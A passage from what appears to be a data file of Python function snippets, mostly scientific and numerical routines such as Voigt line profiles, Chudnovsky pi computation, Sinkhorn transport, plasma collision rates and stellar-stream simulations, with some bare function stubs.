hwhm_stark) / sigma_doppler / np.sqrt(2))) / \\\n sigma_doppler / np.sqrt(2 * np.pi)\n # (see https://scipython.com/book/chapter-8-scipy/examples/the-voigt-profile/)\n\n ls_szd = self.zeeman_split(self.freq_axis, self.freq_centre, ls_sd)\n\n return ls_szd", "def pi_chudnovsky_bs(self,digits):\n C = 640320\n C3_OVER_24 = C**3 // 24\n def bs(a, b):\n \"\"\"\n Computes the terms for binary splitting the Chudnovsky infinite series\n \n a(a) = +/- (13591409 + 545140134*a)\n p(a) = (6*a-5)*(2*a-1)*(6*a-1)\n b(a) = 1\n q(a) = a*a*a*C3_OVER_24\n \n returns P(a,b), Q(a,b) and T(a,b)\n \"\"\"\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab\n # how many terms to compute\n DIGITS_PER_TERM = math.log10(C3_OVER_24/6/2/6)\n N = int(digits/DIGITS_PER_TERM + 1)\n # Calclate P(0,N) and Q(0,N)\n P, Q, T = bs(0, N)\n one_squared = mpz(10)**(2*digits)\n sqrtC = gmpy2.isqrt((10005*one_squared))\n return (Q*426880*sqrtC) // T", "def deltaW(N, m, h):\n return np.random.normal(0., np.sqrt(h), (N, m))\n # return levy.rvs(0., 1e-11, (N, m))+np.random.normal(0., np.sqrt(h), (N, m)) #levy distribution\n # return cauchy.rvs(0., 1e-4, (N, m)) #Cauchy distribution", "def generar_polinomio(self):\n\t\tself.poli = 0\n\t\tfor i in range(len(self.v)):\n\t\t\tpoli2 = n(self.diferencias_divididas(self.v[0:i+1]))\n\t\t\tfor j in range(i):\n\t\t\t\tpoli2 *= self.x-self.v[j][0]\n\t\t\tself.poli = self.poli + poli2", "def worddist(self):\n #return (self.n_z_t + self.beta) / (self.n_z[:, numpy.newaxis] + self.V * self.beta), len(self.n_z)\n return (self.n_z_t + self.n_w_d + self.beta) / (self.n_z[:, numpy.newaxis] + self.n_w[:, numpy.newaxis] + self.V * self.beta), len(self.n_z)", "def wci(B,mu):\n return eV2J*B/mp/mu", "def w_DE(self, z):\n return self.w0+self.wa*z/(1.+z)", "def pp(self):\n \n return np.cross(self.v, self.w) / np.dot(self.w, self.w)", "def silverman(n: int, ess: float) -> float:\n\n return (ess * (n + 2) / 4) ** (-1 / (n + 4))", "def wigner_gaunt(l1, l2, m):\n pref = sqrt((2*l1 + 1)*(2*l2 + 1)/(4*pi))\n return np.array([pref*sqrt(2*lpp + 1)*float(wigner_3j(l1,l2,lpp,m,-m,0)*wigner_3j(l1,l2,lpp,0,0,0))\n for lpp in range(abs(l1-l2), l1+l2+1, 2)])", "def lkruskalwallish(*args):\r\n args = list(args)\r\n n = [0]*len(args)\r\n all = []\r\n n = map(len,args)\r\n for i in range(len(args)):\r\n all = all + args[i]\r\n ranked = rankdata(all)\r\n T = tiecorrect(ranked)\r\n for i in range(len(args)):\r\n args[i] = ranked[0:n[i]]\r\n del ranked[0:n[i]]\r\n rsums = []\r\n for i in range(len(args)):\r\n rsums.append(sum(args[i])**2)\r\n rsums[i] = rsums[i] / float(n[i])\r\n ssbn = sum(rsums)\r\n totaln = sum(n)\r\n h = 12.0 / (totaln*(totaln+1)) * ssbn - 3*(totaln+1)\r\n df = len(args) - 1\r\n if T == 0:\r\n raise ValueError, 'All numbers are identical in lkruskalwallish'\r\n h = h / float(T)\r\n return h, chisqprob(h,df)", "def _derW(self, w, x, y, z):\n raise NotImplementedError()", "def _pettifor_numbers():\n return { \"Li\": 0.45,\n \"Be\": 1.5,\n \"B\": 2.0,\n \"C\": 2.5,\n \"N\": 3.0, \n \"O\": 3.5,\n \"F\": 4.0,\n \n \"Na\": 0.4,\n \"Mg\": 1.28,\n \"Al\": 1.66,\n \"Si\": 1.92,\n \"P\": 2.18,\n \"S\": 2.44,\n \"Cl\": 2.70,\n \n \"K\": 0.35,\n \"Ca\": 0.60,\n \"Sc\": 0.74,\n \"Ti\": 0.79,\n \"V\": 0.84,\n \"Cr\": 0.89,\n \"Mn\": 0.94,\n \"Fe\": 0.99,\n \"Co\": 1.04,\n \"Ni\": 1.09,\n \"Cu\": 1.20,\n \"Zn\": 1.44,\n \"Ga\": 1.68,\n \"Ge\": 1.92,\n \"As\": 2.16,\n \"Se\": 2.40,\n \"Br\": 2.64,\n\n \"Rb\": 0.30,\n \"Sr\": 0.55,\n \"Y\": 0.70,\n \"Zr\": 0.76,\n \"Nb\": 0.82,\n \"Mo\": 0.88,\n \"Tc\": 0.94,\n \"Ru\": 1.00,\n \"Rh\": 1.06,\n \"Pd\": 1.12,\n \"Ag\": 1.18,\n \"Cd\": 1.36,\n \"In\": 1.60,\n \"Sn\": 1.84,\n \"Sb\": 2.08,\n \"Te\": 2.32,\n \"I\": 2.56,\n \n \"Cs\": 0.25,\n \"Ba\": 0.50,\n \"La\": 0.748,\n \"Hf\": 0.775,\n \"Ta\": 0.83,\n \"W\": 0.885,\n \"Re\": 0.94,\n \"Os\": 0.995,\n \"Ir\": 1.05,\n \"Pt\": 1.105,\n \"Au\": 1.16,\n \"Hg\": 1.32,\n \"Tl\": 1.56,\n \"Pb\": 1.80,\n \"Bi\": 2.04,\n \"Po\": 2.28, \n \"At\": 2.52 }", "def ppd(self):\n return math.sqrt(np.dot(self.v, self.v) / np.dot(self.w, self.w) )", "def make_voig(w,minZ,maxZ,m=mz0,fixw=False):\n cmds = []\n cmds.append('m[%s,%s,%s]'%(m,minZ,maxZ))\n cmds.append('width[2.49,0,5.0]')\n cmds.append('sigma[1,0,5.0]')\n cmds.append(\"RooVoigtian::voig(x,m,width,sigma)\")\n [w.factory(cmd) for cmd in cmds]\n if fixw:\n w.var('width').setConstant(kTRUE) if w.var('width') else None\n return w.pdf('voig'), kFALSE", "def sinkhorn_log(mu,nu,c,epsilon, \n options={'niter':1000, 'tau':-0.5, 'rho':np.inf}):\n\n for key,val in zip(['tau','rho','niter'],[-.5,np.inf,500]):\n options.setdefault(key, val)\n rho,tau,niter = options['rho'],options['tau'],options['niter']\n\n lam = rho/(rho+epsilon)\n if rho==np.inf:\n lam=1.0\n\n H1 = np.ones_like(mu)\n H2 = np.ones_like(nu)\n\n ave = lambda tau, u, u1: tau*u+(1-tau)*u1\n\n lse = lambda A: np.log(np.sum(np.exp(A),axis=1))\n M = lambda u,v:(-c+u[:,np.newaxis]@H2[np.newaxis,:] + H1[:,np.newaxis]@v[np.newaxis,:] )/epsilon\n\n # kullback divergence\n H = lambda p: -np.sum( p.flatten()*(np.log(p.flatten()+1e-20)-1) )\n KL = lambda h,p: np.sum( h.flatten()* np.log( h.flatten()/p.flatten() ) - h.flatten()+p.flatten())\n KLd = lambda u,p: np.sum( p.flatten()*( np.exp(-u.flatten()) -1) )\n dotp = lambda x,y: np.sum(x*y); \n\n err,Wprimal,Wdual = [],[],[]\n u = np.zeros_like(mu)\n v = np.zeros_like(nu)\n\n for _ in range(niter):\n u1=u\n u = ave(tau, u, lam*epsilon*np.log(mu) - lam*epsilon*lse( M(u,v) ) + lam*u )\n v = ave(tau, v, lam*epsilon*np.log(nu) - lam*epsilon*lse( M(u,v).T) + lam*v )\n gamma = np.exp(M(u,v))\n\n if rho==np.inf: \n Wprimal.append(dotp(c,gamma) - epsilon*H(gamma))\n Wdual.append( dotp(u,mu) + dotp(v,nu) - epsilon*np.sum(gamma) )\n err.append( np.linalg.norm( np.sum(gamma,axis=1)-mu ) )\n else:\n Wprimal.append( dotp(c,gamma) - epsilon*H(gamma) \\\n + rho*KL(np.sum(gamma,axis=1),mu) \\\n + rho*KL(np.sum(gamma,axis=0),nu) )\n\n Wdual.append( -rho*KLd(u/rho,mu) - rho*KLd(v/rho,nu) \\\n - epsilon*np.sum( gamma))\n err.append(np.linalg.norm(u-u1, ord=1) )\n \n WDistance = Wprimal[-1]+epsilon*H(gamma)\n\n return gamma,Wprimal,Wdual,err,WDistance", "def get_van_Der_Waals_radius(self):\n return self.van_Der_Waals_radius", "def vcrit(Te):\n vcrit = 3.0*np.sqrt(np.pi)/4.*(2.*eV2J/me)**(1.5)*(me/mi)*np.sqrt(Te**3.)\n return vcrit", "def psVoigt(self, X, xm, amp, w, m):\n return m * self.lorentz(X, xm, amp, w) + (1-m) * self.gauss(X, xm, amp, w)", "def birch_murnaghan(p, v):\n return p[0]+9.0/16*p[3]*p[1]*( ( (p[3]/v)**(2.0/3)-1 )**3*p[2]+\n ( (p[3]/v)**(2.0/3)-1 )**2*\n ( 6-4*(p[3]/v)**(2.0/3) ) )", "def pi_chudnovsky_bs(digits):\n C = 640320\n C3_OVER_24 = C**3 // 24\n def bs(a, b):\n \"\"\"\n Computes the terms for binary splitting the Chudnovsky infinite series\n\n a(a) = +/- (13591409 + 545140134*a)\n p(a) = (6*a-5)*(2*a-1)*(6*a-1)\n b(a) = 1\n q(a) = a*a*a*C3_OVER_24\n\n returns P(a,b), Q(a,b) and T(a,b)\n \"\"\"\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab\n # how many terms to compute\n DIGITS_PER_TERM = math.log10(C3_OVER_24/6/2/6)\n N = int(digits/DIGITS_PER_TERM + 1)\n # Calclate P(0,N) and Q(0,N)\n P, Q, T = bs(0, N)\n one_squared = mpz(10)**(2*digits)\n sqrtC = gmpy2.isqrt(10005*one_squared)\n return (Q*426880*sqrtC) // T", "def collnud(Te,nev,v):\n return vcrit(Te)/2./v**3*collnu(Te,nev)", "def generate_variations(seed=425, th=150):\n \n # impact parameters\n M = 1e8*u.Msun\n B0 = 19.85*u.kpc\n\n V = 220*u.km/u.s\n phi = coord.Angle(0*u.deg)\n theta = coord.Angle(th*u.deg)\n Tenc = 0.01*u.Gyr\n T = 0.5*u.Gyr\n dt = 0.05*u.Myr\n rs = 0*u.pc\n potential_perturb = 1\n \n # potential parameters (log halo)\n potential = 3\n Vh = 220*u.km/u.s\n q = 1*u.Unit(1)\n rhalo = 20*u.pc\n par_pot = np.array([Vh.si.value, q.value, rhalo.si.value])\n \n # setup tube\n Nstar = 1400\n wx = 30*u.kpc\n wy = 0*u.pc\n wz = 0*u.pc\n sx = 0*u.km/u.s\n \n np.random.seed(seed)\n observer = {'z_sun': 27.*u.pc, 'galcen_distance': 8.3*u.kpc, 'roll': 60*u.deg, 'galcen_coord': coord.SkyCoord(ra=300*u.deg, dec=-90*u.deg, frame='icrs')}\n vobs = {'vcirc': 220*u.km/u.s, 'vlsr': [0, 0, 0]*u.km/u.s}\n wangle = 180*u.deg\n \n xphi = np.linspace(-0.3*np.pi,0.3*np.pi, Nstar)\n xphi0 = np.linspace(-0.1*np.pi, 0.1*np.pi, 1000)\n xphi1 = np.linspace(-0.28*np.pi, -0.1*np.pi, 200)\n xphi2 = np.linspace(0.1*np.pi, 0.32*np.pi, 200)\n xphi = np.concatenate([xphi1, xphi0, xphi2])\n \n Bs = 20*u.kpc\n xr = Bs + np.random.randn(Nstar)*0.0*u.kpc\n x = np.sin(xphi) * xr\n y = np.cos(xphi) * xr\n z = x * 0\n vx = -np.cos(xphi) * Vh\n vy = np.sin(xphi) * Vh\n vz = vx * 0\n ienc = np.argmin(np.abs(x))\n \n farray = np.array([0.1, 0.3, 0.5, 1, 2, 3, 10])\n farray = np.array([0.3,0.5,0.8,0.9,1,1.1,1.2,2,3])\n \n for e, f in enumerate(farray):\n # unperturbed stream\n par_perturb = np.array([0*M.si.value, 0., 0., 0.])\n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B0.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, (T*f).si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream0 = {}\n stream0['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream0['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal0 = coord.Galactocentric(stream0['x'], **observer)\n xeq0 = xgal0.transform_to(coord.ICRS)\n veq0_ = gc.vgal_to_hel(xeq0, stream0['v'], **vobs)\n veq0 = [None] * 3\n veq0[0] = veq0_[0].to(u.mas/u.yr)\n veq0[1] = veq0_[1].to(u.mas/u.yr)\n veq0[2] = veq0_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n R = find_greatcircle(xeq0.ra.deg[::10], xeq0.dec.deg[::10])\n xi0, eta0 = myutils.rotate_angles(xeq0.ra, xeq0.dec, R)\n xi0 = coord.Angle(xi0*u.deg)\n \n # place gap at xi~0\n xioff = xi0[ienc]\n xi0 -= xioff\n \n par_perturb = np.array([M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB + Bs\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, (T*f).si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, open('../data/variations/vary_th{:03d}_T_{:.1f}.pkl'.format(th, f), 'wb'))\n \n # unperturbed stream\n par_perturb = np.array([0*M.si.value, 0., 0., 0.])\n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B0.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream0 = {}\n stream0['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream0['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal0 = coord.Galactocentric(stream0['x'], **observer)\n xeq0 = xgal0.transform_to(coord.ICRS)\n veq0_ = gc.vgal_to_hel(xeq0, stream0['v'], **vobs)\n veq0 = [None] * 3\n veq0[0] = veq0_[0].to(u.mas/u.yr)\n veq0[1] = veq0_[1].to(u.mas/u.yr)\n veq0[2] = veq0_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n R = find_greatcircle(xeq0.ra.deg[::10], xeq0.dec.deg[::10])\n xi0, eta0 = myutils.rotate_angles(xeq0.ra, xeq0.dec, R)\n xi0 = coord.Angle(xi0*u.deg)\n \n # place gap at xi~0\n xioff = xi0[ienc]\n xi0 -= xioff\n \n for e, f in enumerate(farray):\n par_perturb = np.array([f*M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB + Bs\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, (T).si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, open('../data/variations/vary_th{:03d}_M_{:.1f}.pkl'.format(th, f), 'wb'))\n \n for e, f in enumerate(farray):\n par_perturb = np.array([M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB*f + Bs\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, open('../data/variations/vary_th{:03d}_B_{:.1f}.pkl'.format(th, f), 'wb'))\n \n theta0 = theta\n V0 = V\n \n for e, f in enumerate(farray):\n par_perturb = np.array([M.si.value, 0., 0., 0.])\n dB = (B0 - Bs)\n B = dB + Bs\n \n vpar = Vh + np.cos(theta0.rad)*V0\n vperp = np.sin(theta0.rad)*V0\n vpar_scaled = vpar*f\n vperp_scaled = vperp*f\n \n V = np.sqrt((vpar_scaled-Vh)**2 + vperp_scaled**2)\n theta = coord.Angle(np.arctan2(vperp_scaled, vpar_scaled-Vh))\n \n x1, x2, x3, v1, v2, v3 = interact.interact(par_perturb, B.si.value, phi.rad, V.si.value, theta.rad, Tenc.si.value, T.si.value, dt.si.value, par_pot, potential, potential_perturb, x.si.value, y.si.value, z.si.value, vx.si.value, vy.si.value, vz.si.value)\n stream = {}\n stream['x'] = (np.array([x1, x2, x3])*u.m).to(u.pc)\n stream['v'] = (np.array([v1, v2, v3])*u.m/u.s).to(u.km/u.s)\n \n # sky coordinates\n xgal = coord.Galactocentric(stream['x'], **observer)\n xeq = xgal.transform_to(coord.ICRS)\n veq_ = gc.vgal_to_hel(xeq, stream['v'], **vobs)\n veq = [None] * 3\n veq[0] = veq_[0].to(u.mas/u.yr)\n veq[1] = veq_[1].to(u.mas/u.yr)\n veq[2] = veq_[2].to(u.km/u.s)\n \n # rotate to native coordinate system\n xi, eta = myutils.rotate_angles(xeq.ra, xeq.dec, R)\n xi = coord.Angle(xi*u.deg)\n xi -= xioff\n \n outdict = {'x': stream['x'], 'v': stream['v'], 'xi': xi, 'eta': eta, 'observer': observer, 'vobs': vobs, 'R': R, 'xi0': xioff, 'x0': stream0['x'], 'v0': stream0['v']}\n pickle.dump(outdict, open('../data/variations/vary_th{:03d}_V_{:.1f}.pkl'.format(th, f), 'wb'))", "def euc_dist(self, squared=True):", "def v_multiplier(self):\n return (4./3)*np.pi*(self.bins[:, 1]/2)**3", "def h2_potential(dist: float) -> float:\n pass", "def colii_Goldston(mu,Ti,Te,nev,Zi=None):\n if Zi is None:\n Zi = 1.;\n d1 = nev*Zi**4*eV2J**2.5*lnlambda(Te,nev)\n d2 = 12.*np.pi**(1.5)*epsilon**2*(mp*mu)**0.5*Ti**1.5\n return d1/d2", "def compute_w(self):\n self.pinvX = np.linalg.pinv(self.X)\n return np.dot(self.pinvX, self.y)", "def generate_probabilities(self):\n k = 1\n v= 10\n for g in self.class_probabilities:\n curr_list = self.class_probabilities[g]\n for l in range(0,28):\n for w in range(0,28):\n total = float(curr_list[l][w][0] + curr_list[l][w][1] + curr_list[l][w][2])\n curr_list[l][w][0] = (float(curr_list[l][w][0])+k)/(total + k*v) \n curr_list[l][w][1] = (float(curr_list[l][w][1])+k)/(total + k*v)\n curr_list[l][w][2] = (float(curr_list[l][w][2])+k)/(total + k*v)\n curr_list[l][w][3] = curr_list[l][w][0] + curr_list[l][w][1] + curr_list[l][w][2]", "def _Voigt(self, x, g_fwhm, l_fwhm, semi_amp=1, center=0.0):\n\t sigma = g_fwhm / np.sqrt(2.0 * np.log(2.0))\n\n\t return semi_amp * np.real(wofz(((x-center) + 1j*l_fwhm)/(sigma*np.sqrt(2.0)))) / (sigma * np.sqrt(2.0*np.pi))", "def _Voigt(self, x, g_fwhm, l_fwhm, semi_amp=1, center=0.0):\n\t sigma = g_fwhm / np.sqrt(2.0 * np.log(2.0))\n\n\t return semi_amp * np.real(wofz(((x-center) + 1j*l_fwhm)/(sigma*np.sqrt(2.0)))) / (sigma * np.sqrt(2.0*np.pi))", "def solar_ppa():\n per_kwh = 0.196 # [$/kWh]\n\n return per_kwh", "def stdProbabilityNorm(self):\n return 0.5", "def pi_chudnovsky(one):\n k = 1\n a_k = one\n a_sum = one\n b_sum = 0\n C = 640320\n C3_OVER_24 = C**3 // 24\n while 1:\n a_k *= -(6*k-5)*(2*k-1)*(6*k-1)\n a_k //= k*k*k*C3_OVER_24\n a_sum += a_k\n b_sum += k * a_k\n k += 1\n if a_k == 0:\n break\n total = 13591409*a_sum + 545140134*b_sum\n pi = (426880*sqrt(10005*one, one)*one) // total\n return pi", "def strain_distribution(self,na_z,phi):\r\n\t\treturn (self.mesh_center - na_z)*phi", "def Seljak04(self,dc,nu):\n mass_non_linear = (np.argmin((self.sigmaM-dc)**2.).to(self.Msunh)).value\n Mh = (self.M.to(self.Msunh)).value\n x = Mh/self.mass_non_linear\n if len(self.bias_par.keys()) == 0:\n a = 0.53\n b = 0.39\n c = 0.45\n d = 0.13\n e = 40.\n f = 5e-4\n g = 1.5\n else:\n a = self.bias_par['a']\n b = self.bias_par['b']\n c = self.bias_par['c']\n d = self.bias_par['d']\n e = self.bias_par['e']\n f = self.bias_par['f']\n g = self.bias_par['g']\n return a + b*x**c + d/(e*x+1.) + f*x**g", "def compute_windchill(t,v):\n a = 35.74\n b = 0.6215\n c = 35.75\n d = 0.4275\n v16 = v**0.16\n wci = a+(b*t)-(c*v16)+(d*t*v16)\n return wci", "def kepler_U(mu, dt, ro, vro, inv_a, nMax=500):\n\n \"\"\"\n ratios = []\n # For some parabolic comets, using some initial values improves the convergence\n for x in [sqrt(mu)*abs(inv_a)*dt]: #+ LINEAR_GRID :\n converged, result, ratio = kepler_U_prv(mu, x , dt, ro, vro, inv_a, nMax=1000)\n if converged:\n return result \n else :\n ratios.append(str(ratio))\n logger.error(f\"Number max iteration reached but not converged, ratios: {','.join(ratios)}\")\n return result \n \"\"\"\n x = sqrt(mu)*abs(inv_a)*dt\n return myastro.kepler_u.kepler_U(mu, x, dt, ro, vro, inv_a, nMax)", "def potential(Walker):\n V = 0.0\n r_cut = 1.0e-4\n # e-e\n for i in range(Walker.Ne-1):\n for j in range(i+1,Walker.Ne):\n r = sqrt(sum((Walker.Re[i]-Walker.Re[j])**2))\n V += 1.0/max(r_cut,r)\n\n # e-Ion\n for i in range(Walker.Ne):\n for j in range(Walker.Nn):\n r = sqrt(sum((Walker.Re[i]-Walker.Rn[j])**2))\n V -= Walker.Zn[j]/max(r_cut,r)\n\n # Ion-Ion\n for i in range(Walker.Nn-1):\n for j in range(i+1,Walker.Nn):\n r = sqrt(sum((Walker.Rn[i]-Walker.Rn[j])**2))\n V += 1.0/max(r_cut,r)\n\n return V", "def findVWSP(self):\n num=0\n den=0\n ban=False\n for el in self.TL:\n if datetime.fromtimestamp(el.TS) > (datetime.now()-timedelta(minutes = 15)):\n ban=True\n num+=el.Price * el.NoSh\n den+= el.NoSh \n if ban:\n if den!=0:\n return num/den\n else:\n raise BaseException(\"Oops! the vwsp cannot be computed.\")\n else:\n return 0", "def prob_V(self, V_array, mu, sd, v):\n from scipy.integrate import quad\n step = lambda x: 0.5 * (np.sign(x) + 1) # Heaviside step function\n red = lambda V: (V - mu) / sd # reduced voltage\n P_integrand = lambda u: step(u - red(self.V_r)) * np.exp(u**2) # integrand\n \n low = red(V_r)\n up = (self.theta - mu) / sd\n integral = quad(P_integrand, low, up)[0]\n \n P_V_array = 2 * v * self.tau_m * 1e-3 / sd * np.exp(- ((V_array - self.E_L) - mu)**2 / sd**2) * integral\n return step(-(V_array - self.E_L) + self.theta) * P_V_array", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def zapisi_pot(pot):", "def jensen_shannon_div_bern(p, w=None):\n\n n = len(p)\n p = np.array(p)\n\n # make weight matrix sum to 1\n if w is None:\n w = np.ones(n)\n w = (np.array(w) / np.sum(w)).reshape((1, n))\n\n p_sum = np.dot(w, p)\n entropy_of_sum = scipy.stats.bernoulli(p_sum).entropy()\n\n sum_of_entropies = np.dot(w, scipy.stats.bernoulli(p).entropy())\n\n return entropy_of_sum - sum_of_entropies", "def muscovite():\n\n rho = 2834.\n\n C = np.zeros((6,6), dtype=float)\n C[0,0] = 181.; C[0,1] = 48.8; C[0,2] = 25.6; C[0,3] = 0.; C[0,4] = -14.2; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 178.4; C[1,2] = 21.2; C[1,3] = 0.; C[1,4] = 1.1; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 58.6; C[2,3] = 0.; C[2,4] = 1.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 16.5; C[3,4] = 0.; C[3,5] = -5.2\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 19.5; C[4,5] = 0.\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 72.\n\n return C, rho", "def hornblende():\n\n rho = 3200.\n\n C = np.zeros((6,6), dtype=float)\n C[0,0] = 116.; C[0,1] = 49.9; C[0,2] = 61.4; C[0,3] = 0.; C[0,4] = 4.3; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 159.7; C[1,2] = 65.5; C[1,3] = 0.; C[1,4] = -2.5; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 191.6; C[2,3] = 0.; C[2,4] = 10.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 57.4; C[3,4] = 0.; C[3,5] = -6.2\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 31.8; C[4,5] = 0.\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 36.8\n\n return C, rho", "def lorentzian(mu, wid, x): \n return np.ones(len(x) ) / (1 + ( (x - mu) / (0.5 * wid) )**2)", "def _compute_likelihood_variables(self):\r\n #At this point get the hessian matrix (or vector as W is diagonal)\r\n self.W = -self.noise_model.d2logpdf_df2(self.f_hat, self.data, extra_data=self.extra_data)\r\n\r\n if not self.noise_model.log_concave:\r\n i = self.W < 1e-6\r\n if np.any(i):\r\n warnings.warn('truncating non log-concave likelihood curvature')\r\n # FIXME-HACK: This is a hack since GPy can't handle negative variances which can occur\r\n self.W[i] = 1e-6\r\n\r\n self.W12BiW12, self.ln_B_det = self._compute_B_statistics(self.K, self.W, np.eye(self.N))\r\n\r\n 